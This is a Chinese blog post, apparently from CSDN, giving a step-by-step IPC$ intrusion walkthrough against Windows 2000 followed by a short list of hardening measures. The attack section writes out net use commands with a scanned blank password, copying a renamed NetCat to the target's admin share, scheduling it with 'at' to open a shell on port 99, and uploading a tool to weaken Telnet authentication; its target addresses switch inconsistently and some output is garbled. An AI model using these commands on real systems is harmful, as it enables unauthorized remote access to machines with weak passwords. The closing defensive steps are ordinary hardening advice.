IPC$入侵

最新推荐文章于 2024-08-31 21:18:38 发布
最新推荐文章于 2024-08-31 21:18:38 发布
阅读量809 收藏 1
点赞数
分类专栏: Network 文章标签: microsoft windows server authentication build login

IPC$入侵

  IPC$是Windows的默认共享。其实,这个共享并没有什么漏洞。

  我们可以用主机的管理员用户名和密码连接。

  问题就出在管理员密码了。直至现在为止,世界上起码有20%的人,把主机密码设置为“空”或者“123”等简单密码。

  我们要寻找这些主机十分简单。只需要一个程序就可以。

  下面,我会把以前写的一篇IPC$入侵文章,进行小小的修改。

  本次范例需要的系统及程序情况如下:

  操作系统:Windows 2000

  对方操作系统:Windows 2000

  程序(一):流光 IV 国际版 (Fluxay Release IV Build 2914 International Edition For NT/2000/XP)

  程序(二):Srv.exe

  程序(三):Ntlm.exe

  本机IP:127.0.0.1

  测试IP:127.0.0.25

  新程序介绍:

  Srv.exe:实际上是NetCat,这里改名为Srv.exe。用于在主机建立一个端口为99的shell。

  Ntlm.exe:是小榕写的一个程序,用于修改Windows 2000 Telnet Servery身份验证的方式。

  关于扫描的方法,在流光的help目录有一个ipc.mht的文件。里面有使用说明。

  假设,我们扫描了一台IPC$主机:127.0.0.25

  用户名:davis

  密码:空

  “//”后是注解。

  Microsoft Windows 2000 [Version 5.00.2195]

  (C) 版权所有 1985-1998 Microsoft Corp.

  D:>net use /217.0.0.25$ "" /user:"davis" //这是我用流光扫到的密码~~~我们就拿它开刀吧~!

  命令成功完成。

  D:>copy srv.exe /217.0.0.25$ //先复制srv.exe上去,在流光的Tools目录就有。

  已复制 1 个文件。

  D:>net time /217.0.0.25 //查查时间。

  /217.0.0.25 的当前时间是 2001/1/17 上午 10:48

  命令成功完成。

  D:>at //217.0.0.25 10:50 srv.exe //用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)先去论坛灌几篇帖子。

  新加了一项作业,其作业 ID = 1

  D:>net time //217.0.0.25 //再查查够时间没有?!噢~~够了~

  217.0.0.25 的当前时间是 2001/1/17 上午 10:51

  命令成功完成。

  D:>telnet 217.0.0.25 99 //我们telnet吧,注意端口是99哦~

  Microsoft Windows 2000 [セ 5.00.2195]

  (C) Copyright 1985-1999 Microsoft Corp.

  C:> //噢~~成功了!

  D:>copy ntlm.exe //217.0.0.25$ //我们再开一个DOS窗口,把ntlm.exe上传到主机上。(也是在流光流光的Tools目录)

  已复制 1 个文件。

  Microsoft Windows 2000 [セ 5.00.2195]

  (C) Copyright 1985-1999 Microsoft Corp.

  C:>ntlm //我们输入ntlm启动吧。

  ntlm

  Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.

  Done! //OK~:)

  C:>

  C:>net start telnet //然后直接用net start telnet启动telnet.

  net start telnet

  Telnet 狝叭タ币笆 .

  Telnet 狝叭竒币笆Θ //直觉告诉我成功了~!(没办法,这里是乱码)

  C:>

  C:> //这个窗口已经没用了,关了他吧!

  D:>telnet 127.0.0.25 //我们在开一个DOS窗口,然后telnet上去。

  NTLM Authentication failed due to insufficient credentials. Please login with

  clear text username and password

  Microsoft (R) Windows (TM) Version 5.00 (Build 2195)

  Welcome to Microsoft Telnet Service

  Telnet Server Build 5.00.99201.1

  login: davis //输入用户名

  password: //输入密码(密码是空的,所以不用输入)

 

如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码,防止通过ipc$穷举密码

snlei
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IPC$入侵攻防完全解惑
Kevin Wu的专栏
02-01 2218
IPC$入侵攻防完全解惑摘自“黑客X档案"     原作者:iqst1,什么是IPC$?IPC$(Internet Process Connection)是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可建立安全通道,并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是winNT/2000的一项新功能,它有一个特点,即在
IPC$入侵大全
weixin_30567471的博客
08-20 233
0x01 ipc$的定义 IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而...
4. 内网渗透之IPC$入侵
weixin_30394669的博客
02-08 877
IPC$连接 IPC$的概念: IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 IPC$的作用: 利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列...
IPC$入侵综述
Yuan Lei 's Blog
01-24 2476
IPC$入侵综述 什么是ipcIPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)
ipc$入侵与防范(超详细)
weixin_63400287的博客
12-13 2737
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的。
【内网横向】IPC$入侵
网络安全从业者的学习笔记
06-26 452
IPC(Internet Process Connection)共享“命名管道”的资源,内网横向时常常用得到。IPC$利用的条件1、目标开启139、445端口。2、已有目标凭证(密码、hash等)
渗透之——内网IPC$入侵
冰河的专栏
01-07 2579
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85995503 一、域操作相关的命令 1.查看域用户 net user/domain 2.查看有几个域 net view/domain 3.查看域内的主机 net view/domain: XXX 4.查看域里面的组 net group/domain 5...
03IPC$入侵--空连接漏洞知识.pdf
01-30
IPC$入侵--空连接漏洞知识 IPC$入侵是指攻击者利用 IPC$ 空连接漏洞来与目标主机建立连接,获取目标主机的一些关键信息,从而可能对目标主机造成一定的安全威胁。 IPC$空连接漏洞是指在 Windows 操作系统中,客户...
IPC$入侵防御实验.doc
11-14
IPC$入侵防御实验.doc
批处理大观 IPC$入侵bat telnetbat 开机后台运行 等
06-14
在这个压缩包文件中,我们看到了与批处理相关的几个重要概念:IPC$入侵、telnetbat以及开机后台运行。 首先,让我们详细了解一下IPC$入侵IPC$(Inter-Process Communication)是Windows系统中的一个共享通信机制...
一份详尽的IPC$入侵资料
07-06
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一...
ipc$入侵加hydra暴力破解
qq_43183215的博客
06-09 1370
本人萌新一枚,多多关照。第一次搞小入侵在论坛发帖子有点小紧张。 主机:Win7 目标:Win2003 知道了ip后用hydra来爆破密码(smb) 爆破成功! 知道靶机密码然后用ipc$入侵Win2003 先建立ipc$非空连接 写个小bat文件(人人都会) 搞个后门叫WHOAMI密码为123 后门创建成功 再断开ipc$连接 然后用a...
IO进程day04(进程)
dghbs的博客
08-28 1481
程序:编译好的可执行文件存放在磁盘上的指令和数据的有序集合(文件)程序是静态的,没有任何执行的概念进程:一个独立的可调度的任务执行一个程序分配资源的总称进程是程序执行的一次过程进程是动态的,包括创建、调度、执行、消亡(1)守护进程是一个生存周期较长的进程,通常独立于控制终端并且周期性的执行某种任务或者等待处理某些待发生的事件(2)大多数服务都是通过守护进程实现的(3)关闭终端,相应的进程都会被关闭,而守护进程却能够突破这种限制今天的分享就到这里结束啦,如果有哪里写的不好的地方,请指正。
从python应用app向微软Microsoft Teams Channel发送消息message
lerry的博客
08-28 462
本文基于python应用和Teams工具,实现了发送消息到Teams的功能,对pyteams进行了二次封装,如果可能的话,有考虑把这个封装模块贡献到pyteams仓库。
微软将持续多年的 Mono 项目移交给 Wine
weixin_41446370的博客
08-28 601
自Mono项目上一次作为开源.NET框架发布以来,已经过去了五年时间,此前Wine已经使用了Mono的代码,而在微软专注于开源.NET和其他工作的情况下,此举是合理的,将控制权移交给WineHQ是微软的明智之举,这样可以避免上游Mono项目消亡或分叉。这项工作现已完成,我们建议 Mono 的活跃用户和基于 Mono 的应用程序框架的维护者迁移到包含该分叉工作的 .NET。Mono 项目(mono/mono)(“原始 Mono”)自 2001 年启动以来一直是 .NET 生态系统的重要组成部分。
超越基础:Visual Basic在科学计算与数据分析的革新应用
2401_85761003的博客
08-28 868
Visual Basic是一种由微软开发的事件驱动编程语言,以其图形用户界面(GUI)和快速应用程序开发(RAD)而广受欢迎。VB提供了丰富的控件和组件,使得开发者能够快速构建应用程序。
【C++ 第十八章】C++11 新增语法(3)
最新发布
唯有忍受别人不能忍受的,才能享受别人不能享受的
08-31 944
可变参数模板:参数包的用法、参数包展开的几种方法; emplace_back 函数:为什么该函数会比 push_back 高效
学生管理系统升级(登录注册 + 关联学生管理系统)
Y0UZI的博客
08-28 432
这是在昨天的基础初代版本上面新增一个登录注册忘记密码的功能。
提升网络安全:防范IPC$入侵与常用网络命令详解
本文主要探讨了如何防范IPC$入侵,以及在IT安全领域中关于网络命令的使用技巧。在计算机网络安全的基础中,了解和掌握这些常用网络命令至关重要。首先,针对防止IPC$(全称为Inter-Process Communication)服务的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值